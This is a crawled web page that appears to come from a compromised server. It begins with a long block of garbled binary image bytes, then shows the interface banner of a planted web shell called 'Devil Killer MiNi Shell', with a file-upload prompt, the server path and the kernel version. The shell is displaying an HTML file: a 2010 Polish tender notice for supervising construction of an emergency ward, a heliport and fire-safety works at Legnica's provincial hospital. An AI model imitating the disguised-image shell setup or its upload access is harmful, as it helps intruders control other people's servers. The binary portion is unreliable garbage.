JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100623/180452-N-2010.html

<p class="kh_header"><b>Legnica: PRZETARG NIEOGRANICZONY NA PEŁNIENIE NADZORU INWESTORSKIEGO NAD
 REALIZACJĄ ZADAŃ INWESTYCYJNYCH  PN. URUCHOMIENIE SZPITALNEGO ODDZIAŁU RATUNKOWEGO WRAZ Z BUDOWĄ HELIPORTU W WOJEWÓDZKIM SZPITALU SPECJALISTYCZNYM W LEGNICY ORAZ NAD
WYKONANIEM ROBÓT BUDOWLANYCH W RAMACH REALIZACJI CZĘŚCI ZADANIA PN.  DOSTOSOWANIE OBIEKTÓW SZPITALA DO WYMOGÓW OCHRONY PRZECIWPOŻAROWEJ, ETAP I - BUDYNKI 1A, 1C, 1E
W WOJEWÓDZKIM SZPITALU SPECJALISTYCZNYM W LEGNICY</b><br>
<b>Numer ogłoszenia: 180452 - 2010; data zamieszczenia: 23.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny w Legnicy , ul. J. Iwaszkiewicza 5, 59-220 Legnica, woj. dolnośląskie, tel. (076) 721 11 26, faks (076) 721 11 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY NA PEŁNIENIE NADZORU INWESTORSKIEGO NAD
 REALIZACJĄ ZADAŃ INWESTYCYJNYCH  PN. URUCHOMIENIE SZPITALNEGO ODDZIAŁU RATUNKOWEGO WRAZ Z BUDOWĄ HELIPORTU W WOJEWÓDZKIM SZPITALU SPECJALISTYCZNYM W LEGNICY ORAZ NAD
WYKONANIEM ROBÓT BUDOWLANYCH W RAMACH REALIZACJI CZĘŚCI ZADANIA PN.  DOSTOSOWANIE OBIEKTÓW SZPITALA DO WYMOGÓW OCHRONY PRZECIWPOŻAROWEJ, ETAP I - BUDYNKI 1A, 1C, 1E
W WOJEWÓDZKIM SZPITALU SPECJALISTYCZNYM W LEGNICY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na pełnieniu nadzoru inwestorskiego, nad robotami budowlano-montażowymi w ramach niżej wymienionych zadań inwestycyjnych, w zakresie niezbędnym do ich właściwej realizacji w myśl przepisów ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz. U. Nr 89, poz. 414, z późniejszymi zmianami)
- Zadania 1 - stanowiącego realizację wybranej części zadania inwestycyjnego  pod nazwą Dostosowanie obiektów szpitala do wymogów ochrony przeciwpożarowej - Etap I - budynki 1A, 1C, 1E,
 -Zadania 2 pod nazwą: Uruchomienie Szpitalnego Oddziału Ratunkowego wraz z budową  heliportu (współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach działania 12.1 - Rozwój systemu ratownictwa medycznego priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013  Projekt pn.  Uruchomienie szpitalnego oddziału ratunkowego wraz z budową heliportu w Wojewódzkim Szpitalu Specjalistycznym w Legnicy), 
- Zadania 3, stanowiącego realizację wybranej części zadania pod nazwą: Dostosowanie obiektów szpitala do wymogów ochrony przeciwpożarowej , Etap I - budynki 1A, 1C, 1E ,
w  Wojewódzkim Szpitalu Specjalistycznym w Legnicy, przy ul. Iwaszkiewicza 5.

1. W zakresie Zadania 1 pełnienie nadzoru inwestorskiego dotyczyć będzie robót budowlanych polegających na:
a) Przebudowie części wewnętrznych dróg dojazdowych przy budynku szpitalnym 1 C w zakresie wskazanym w dokumentacji projektowej wykonanej przez Przedsiębiorstwo Budowlano-Projektowe Ryszard Klimas: Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej. Projekt wykonawczy. Branża drogowa. Obszar przebudowywanych dróg zaznaczony jest na rysunku nr 1.1 tej dokumentacji, zatytułowanym  Plan sytuacyjny terenu, przy czym: przedmiot zamówienia nie obejmuje  robót w zakresie poszerzenia istniejącego odcinka drogi oraz wykonania chodników, pomimo wskazania tego zakresu robót na rysunku nr 1.1 w projekcie wykonawczym. Roboty w zakresie poszerzenia istniejącego odcinka drogi, wykonania chodników, będą realizowane według  Zadania 2. W obszarze przebudowywanej drogi znajdują się elektryczne linie kablowe oraz studnie kanalizacji deszczowej - roboty wynikające z potrzeby ich przebudowy ze względu na roboty drogowe wchodzą w zakres przedmiotu zamówienia.
b) Przebudowie części stropu piwnicznego pod przejazdem w budynku 1 C,
c) wzmocnieniu fundamentu filara estakady znajdującego się przy przebudowywanej drodze dojazdowej do przejazdu pod budynkiem 1C,
d)  remoncie murów oporowych znajdujących się po obu stronach przebudowywanej drogi dojazdowej do przejazdu w budynku 1 C,
e) Wymianie okładzin elewacyjnych w budynkach wraz z demontażem i utylizacją płyt azbestowo-cementowych - wymianę części (pionowych pasów) okładzin elewacyjnych budynków 1A, 1C, 1E i 1G na obudowy z płyt warstwowych.
Wymiana dotyczy pionowych pasów okładzin elewacyjnych wskazanych w projekcie budowlanym: Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej, I Etap - budynki 1A, 1C, 1E wraz z demontażem płyt cementowo-azbestowych i ich utylizacją. Projekt ten obejmuje swoim zakresem wymianę okładzin elewacyjnych oprócz budynków 1A, 1C, 1E, również budynek 1G. Wymiana okładzin elewacyjnych wymaga przełożenia kanałów wentylacji mechanicznej prowadzonych po ścianie elewacyjnej na odcinku od poziomu parteru do poziomu dachu budynku 1C . Kanały wentylacyjne wykonane z rur stalowych, izolowane, znajdują  się w dwóch miejscach, w narożach na styku budynków 1C i 1A. 
f) wykonaniu tymczasowej drogi dojazdowej umożliwiającej zjazd karetek z estakady przy budynku szpitalnym 1C na czas wykonywania robót drogowych będących  przedmiotem zamówienia (po zakończeniu robót wykonywanych w ramach przedmiotu zamówienia teren zajęty pod tymczasowa drogę powinien być doprowadzony do stanu pierwotnego),
g) zebraniu warstwy gruntu na istniejącym terenie zielonym, w miejscu przeznaczonym  na planowany chodnik przy przebudowywanej drodze. Dotyczy chodnika zaznaczonego na rysunku nr 1.1 zatytułowanym Plan sytuacyjny terenu w dokumentacji: Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej. Projekt wykonawczy. Branża drogowa. 


Szczegółowy zakres robót, o których mowa w w pkt. a-g określają
1) Projekt budowlany Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej, I Etap - budynki 1A, 1C, 1E 
2) Projekt wykonawczy Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej. I Etap - budynki 1A, 1C, 1E. Branża drogowa
3) Specyfikacja techniczna wykonania i odbioru robót Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej I Etap - budynki 1A, 1C, 1E
 Branża: Architektoniczna i konstrukcyjna,
4) Specyfikacja techniczna wykonania i odbioru robót Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej I Etap - budynki 1A, 1C, 1E Branża: Drogowa 
5) Przedmiar robót Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej I Etap - budynki 1A, 1C, 1E Branża budowlana. (Opisany jako Cześć pierwsza)
6) Przedmiar robót Dostosowanie obiektów Szpitala do wymogów ochrony przeciwpożarowej I Etap - budynki 1A, 1C, 1E Branża drogowa).
7) Przedmiar robót uzupełniajacy Dostosowanie obiektów szpitala do wymogów  ochrony przeciwpożarowej - strop nad piwnicą pod przejazdem budynek 1C
8 Rysunek nr A 1 z zaznaczona drogą tymczasową.
9 Rysunek nr 1.1a -Plan sytuacyjny terenu (uzupełnienie rys. nr 1.1). 

Dokumenty przywołane powyżej zostały sporządzone przez Ryszarda Klimasa prowadzącego Przedsiębiorstwo Budowlano-Projektowe i stanowią integralną część niniejszej specyfikacji.i każdy z nich stanowi element załącznika Z 1
 

2. W zakresie Zadania 2 pełnienie nadzoru inwestorskiego dotyczyć będzie robót budowlanych polegających na:
a) przebudowie części pomieszczeń na wysokim parterze w budynkach szpitalnych 1A i 1C , z dostosowaniem do funkcji Szpitalnego Oddziału Ratunkowego,

b) remoncie estakady podjazdu dla karetek przy budynku 1C,

c) rozbiórce istniejącej otwartej wiaty na podjeździe dla karetek oraz budowę nowej wiaty - z bramami  podnoszonymi na wjeździe i wyjeździe,

d) przebudowie łącznika pomiędzy podjazdem dla karetek, a budynkiem 1C,

e) wykonaniu szybu i montaż dźwigu szpitalnego przy budynku 1C,

f) budowie heliportu (lądowiska dla helikopterów ratunkowych) na terenie szpitalnym, w pobliżu głównego zespołu budynków,     

g) budowie odcinka drogi dojazdowej do lądowiska oraz przebudowę (poszerzenie) odcinka drogi przy wjeździe na plac manewrowy przy budynku 1C,

h) budowie chodników dla pieszych: chodnika łączącego teren lądowiska z budynkiem 1C oraz chodnika łączącego plac manewrowy przy budynku 1C z głównym parkingiem szpitalnym przed budynkiem1D,

 i) wykonaniu tymczasowych, szczelnych, izolowanych akustycznie ścianek działowych i ścianki zaślepiającej otwór drzwiowy, stanowiących  granicę pomiędzy obszarami należącymi do I i II etapu  przebudowy pomieszczeń w budynku 1C, z jednoczesnym demontażem i ponownym montażem części tych ścianek po zakończeniu robót w I etapie i przed rozpoczęciem robót przewidzianych w II etapie.

	Szczegółowy zakres robót wymienionych w ppkt. od a) do h) określają: projekt budowlany, projekty wykonawcze, przedmiary robót oraz specyfikacje techniczne wykonania i odbioru robót budowlanych zawarte w załączniku Z2 do opisu przedmiotu zamówienia ( do siwz).
	Zakres robót wymienionych w ppkt. i) określają: przedmiar robót zawarty w załączniku nr Z2 ( odpowiednio poz.18) do opisu przedmiotu zamówienia ( do siwz) oraz rysunek nr K3 - rzut wysokiego parteru, zawarty w załączniku Z2 (odpowiednio poz.11a ) do opisu przedmiotu zamówienia  ( do siwz).

3.  W zakresie Zadania 3 pełnienie nadzoru inwestorskiego dotyczyć będzie robót budowlanych polegających na 

a) wykonaniu instalacji wodociągowej przeciwpożarowej zasilającej hydranty na wysokim parterze w budynku  1C oraz hydrant i zawór hydrantowy na wysokim parterze strony prawej budynku 1A.
Instalację należy wykonać  od miejsca wpięcia (włączenia się) do instalacji wodociągowej fi 150 (przewidzianego w przestrzeni  instalacyjnej budynku 1A) do pionów instalacji wodociągowej przeciwpożarowej o symbolach PH3A, PH1C,  PH2C, wraz z tymi pionami do  pierwszego piętra włącznie .
Roboty należy wykonać  na podstawie dokumentacji projektowej oraz specyfikacji technicznej  wykonania i odbioru robót budowlanych  zawartych odpowiednio w poz.19, 20 i 34  załącznika Z3 do opisu przedmiotu  zamówienia ( do siwz) w zakresie określonym  na  rysunkach: nr 1, nr 2, nr 3, nr 4 oraz w przedmiarze   robót zawartych w załączniku Z3 (odpowiednio poz. 39,40,41,42 i 26 ) do opisu  przedmiotu  zamówienia ( do siwz)

b) demontażu istniejących ścianek oddzielających klatkę schodową K3 budynku 1A od korytarzy oraz wykonanie ścianek  z drzwiami przeciwpożarowymi oddzielającymi korytarze od  przedsionków  przeciwpożarowych   przy klatce schodowej  K3 budynku 1A na kondygnacjach nadziemnych: na niskim parterze oraz na kondygnacjach od  I do VI piętra  (wysoki  parter  ujęty jest w Zadaniu 2)  oraz wykonanie  w ich miejsce nowych  ścianek oddzielenia  pożarowego wraz  z drzwiami przeciwpożarowymi;  
Roboty należy wykonać  na podstawie dokumentacji projektowej oraz specyfikacji technicznej   wykonania i odbioru robót budowlanych  zawartych odpowiednio w poz.19, 21 i 33  załącznika Z3 do opisu  przedmiotu  zamówienia ( do siwz) w zakresie określonym  na  rysunkach: nr K2 i od  nr K4 do nr K9 oraz w przedmiarze robót zawartych w załączniku Z3 (odpowiednio poz.43, od poz 45 do poz.53 i poz.31 )  do opisu  przedmiotu  zamówienia ( do siwz).         

 c) wykonaniu wentylacji mechanicznej nadciśnieniowej dla klatki schodowej K3 budynku 1A i przyległych  do niej przedsionków przeciwpożarowych wszystkich  kondygnacji  nadziemnych .
	Roboty należy wykonać  na podstawie dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych  zawartych odpowiednio w poz.19, 22 i 35  załącznika Z3 do opisu  przedmiotu  zamówienia (do siwz) w zakresie określonym na  rysunkach :  od nr 1 do nr 11i w przedmiarze robót zawartych w załączniku Z3 (odpowiednio od  poz.54 do poz 64 i poz.25 )  do opisu  przedmiotu  zamówienia (do siwz).

d) wykonaniu i uruchomieniu systemu alarmowania pożarowego (SAP)  w zakresie niezbędnym do jego  funkcjonowania w obszarze:  Szpitalnego Oddziału Ratunkowego (realizowanego w ramach Zadania 1),  klatki schodowej K3 budynku  1A oraz  przedsionków przeciwpożarowych wszystkich kondygnacji  nadziemnych  przy klatce schodowej  K3  w  budynku 1A; 
           	Roboty należy wykonać  na podstawie dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych  zawartych odpowiednio w poz 19, 23  i 37  załącznika Z3  do opisu  przedmiotu  zamówienia (do  do siwz), w zakresie określonym na rysunkach : nr S4,  S12 , S13, S14, E15, E16, E17 i E19 i w przedmiarze robót zawartych w  załączniku Z3 (odpowiednio od  poz.65 do poz 72 i poz.28 ) do opisu przedmiotu  zamówienia ( do  siwz) ;

e) wykonaniu i uruchomieniu dźwiękowego systemu ostrzegania (DSO) w zakresie niezbędnym do jego funkcjonowania w obszarze:  Szpitalnego Oddziału Ratunkowego  (realizowanego w ramach Zadania 1), klatki schodowej K3 budynku  1A oraz  przedsionków  przeciwpożarowych wszystkich kondygnacji nadziemnych  przy klatce schodowej  K3  w  budynku 1A;
	Roboty należy wykonać  na podstawie dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych  zawartych odpowiednio w poz 19, 24  i 38  załącznika Z3  do opisu przedmiotu zamówienia (do siwz), w zakresie określonym na rysunkach: nr D1, D3 , D4,  D2  i w przedmiarze robót  zawartych w  załączniku Z3 (odpowiednio od  poz.73 do poz 76 i poz.29 ),  do opisu  przedmiotu  zamówienia (do siwz) ;

f) montażu  klap przeciwpożarowych w przewodach wentylacji mechanicznej  na granicy stref pożarowych  pomiędzy budynkami 1A i 1C na wysokim parterze, 
Roboty należy wykonać  na podstawie dokumentacji projektowej oraz specyfikacji technicznej  wykonania i odbioru robót budowlanych i  przedmiaru robót zawartych odpowiednio w poz 19, 20, 34 i 30  załącznika Z3  do opisu  przedmiotu zamówienia (do siwz) w zakresie określonym na  rysunku nr 14a zawartym w załączniku Z3 ( poz 77 ) do opisu  przedmiotu  zamówienia (do siwz)

g) wymianie okna na okno  przeciwpożarowe nie otwierane E160 (kwaterę stałą), demontaż części okien, zaślepienie otworów okiennych w miejscu zdemontowanych okien oraz wymianę płyt gipsowo-kartonowych na wysokim parterze w budynku 1C  
	Roboty należy wykonać  na podstawie dokumentacji projektowej oraz specyfikacji technicznej wykonania i odbioru robót budowlanych i przedmiaru robót zawartych  odpowiednio w poz 19, 32 i 33  załącznika Z3 do opisu  przedmiotu zamówienia ( do siwz) w zakresie określonym na  rysunku  nr K3 zawartym w załączniku Z3 (odpowiednio poz 44 ) do opisu  przedmiotu  zamówienia (do siwz)

Uwagi: 
1) Roboty ujęte w Zadaniu 2 i Zadaniu 3 będą  wykonane dwuetapowo: 
 a) w I etapie wykonywane będą:
- przebudowę  pomieszczeń z dostosowaniem do funkcji  Szpitalnego Oddziału Ratunkowego na wysokim  parterze w budynku 1A oraz na wysokim parterze prawej strony budynku 1C .Granicę pomiędzy obszarami należącymi do I i II etapu przebudowy pomieszczeń zaznaczono w dokumentacji projektowej na rysunku nr K3 ( rzut  wysokiego parteru), zawartym w załączniku Z2 (poz.44 ) do  opisu przedmiotu zamówienia  ( do siwz),
-  remont estakady podjazdu dla karetek przy budynku 1C,
-  rozbiórkę istniejącej otwartej wiaty na podjeździe dla karetek oraz budowę nowej wiaty - z  bramami podnoszonymi na wjeździe i wyjeździe,
-  przebudowę łącznika pomiędzy podjazdem dla karetek, a budynkiem 1C,
-  montaż dźwigu szpitalnego przy budynku 1C,
-  przebudowę (poszerzenie) odcinka drogi przy wjeździe na plac manewrowy przy budynku 1C,
 b) w II etapie wykonywane będą:
-  przebudowę  pomieszczeń z dostosowaniem do funkcji  Szpitalnego Oddziału Ratunkowego na wysokim parterze w budynku 1A oraz na wysokim parterze lewej strony budynku 1C,
2) Zamawiający wymaga, aby roboty ujęte w Zadaniu  3, były skoordynowane z harmonogramem robót realizowanych w ramach Zadania 2, z uwzględnieniem dwuetapowej ich realizacji.
 Część robót ujętych w Zadaniu 3 musi być wykonana w czasie prowadzenia robót przewidzianych  w ramach Zadania 2 w I etapie zakresie umożliwiającym częściowe użytkowanie, o którym mowa w punkcie 3 a.)
 Roboty przewidziane w II etapie w ramach Zadania 2 i Zadania 3 nie mogą  być prowadzone na obszarze  wyznaczonym dla I etapu  realizacji  i nie mogą stanowić przeszkody w funkcjonowaniu Szpitalnego Oddziału Ratunkowego, który zostanie uruchomiony w obszarze objętym I etapem realizacji. 
3) Zamawiający wymaga, aby przejęcie pod zagospodarowanie i rozpoczęcie użytkowania obiektów następowało w kolejności wynikającej z etapowej realizacji:
a) W pierwszej kolejności nastąpi rozpoczęcie użytkowania obiektów po zakończeniu robót realizowanych w I etapie  w ramach Zadania 2 i Zadania  3.
b) Przekazanie terenu budowy w celu wykonania robót przewidzianych do realizacji w II etapie nastąpi  po uprzednim: zakończeniu robót realizowanych w I etapie, przejęciu do użytkowania obiektów realizowanych w I etapie, rozpoczęciu działalności Szpitalnego Oddziału Ratunkowego na terenie i w obiektach  zrealizowanych w I etapie. Przewiduje się przekazanie terenu budowy w zakresie pomieszczeń przewidzianych do realizacji w II etapie w terminie nie dłuższym niż 7 dni od uzyskania pozwolenia na użytkowanie części obiektu wykonanej w ramach etapu I 
	c) rozpoczęcie użytkowania obiektów zrealizowanych w ramach Zadania 2 i Zadania 3 w II etapie oraz obiektów zrealizowanych w ramach robót nie objętych etapowaniem, nastąpi w drugiej kolejności.
4) Teren budowy będzie przekazywany Wykonawcy robót budowlanych sukcesywnie zgodnie z etapową realizacją robót będących przedmiotem zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Kwota i termin wniesienia wadium:
a)Oferta musi być zabezpieczona wadium w wysokości  3.800,00.zł
b) Wadium musi obejmować cały okres związania ofertą, także wówczas gdy termin składania ofert zostanie przedłużony.
c) Termin wniesienia wadium upływa wraz z terminem składania ofert o godzinie wyznaczonej na składanie ofert,  tj. 02-07-2010 r. o godz 11.00
d) Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na przedłużony okres związania ofertą lub nie zgodzi się na  przedłużenie terminu związania ofertą w sytuacjach wskazanych w ustawie, zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego.
2. FORMY I MIEJCE WNOSZENIA WADIUM                                 
       a)  w pieniądzu na konto Zamawiającego: 
BGK nr r-ku 36 1130 1033 0018 8002 7220 0012
b) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że       poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) w gwarancjach ubezpieczeniowych i bankowych,
d) poręczeniach udzielanych przez podmioty, o których mowa  w art. 6b ust. 5, pkt. 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002, z późn. zm.).
Wadium wymienione w formach wymienionych w pkt. b-d musi być wystawione na Wojewódzki Szpital Specjalistyczny w Legnicy. Oryginał dokumentu potwierdzającego pokrycie wadium musi być złożony w siedzibie Zamawiającego w pokoju. Nr 43 parter (kasa Zamawiającego)
UWAGA:
3. Wykonawca, którego oferta zostanie wybrana, traci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku,  gdy:
a) odmówi podpisania umowy na warunkach określonych w ofercie,
b) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
c) w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 PZP lub pełnomocnictw, chyba, że udowodni, że okoliczność ta wynika z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia n/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt X.A SIWZ. Z treści dokumentów musi jednoznacznie wynikać, iż n/w  warunki Wykonawca spełnił.
Wykonawca musi udokumentować należyte wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy, w tym okresie:
        a) co najmniej jednego zamówienia odpowiadającego swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj. zamówienia  obejmującego swym  zakresem pełnienie funkcji inspektora nadzoru nad przebudową lub budową obiektu budowlanego o kubaturze min. 10 000 m3 ,  w którym w ramach przebudowy lub budowy wykonano instalacje: centralnego,  ogrzewania, wodno-kanalizacyjną, elektryczną, wentylacji mechanicznej  i klimatyzacji, instalacji i urządzeń sygnalizacji  alarmowania pożarowego, 
       b) co najmniej jednego zamówienia odpowiadającego swoim rodzajem i wartością usłudze  stanowiącej przedmiot zamówienia, tj. zamówienia które obejmuje swym  zakresem pełnienie nadzoru nad budową lub przebudową drogi lub parkingu o powierzchni co   najmniej 1500 m2,
         c)  co najmniej jednego zamówienia odpowiadającego swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia tj pełnienie nadzoru nad budową lub przebudową  obiektu o konstrukcji  żelbetowo-stalowej o  kubaturze co  najmniej 5 000 m3,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
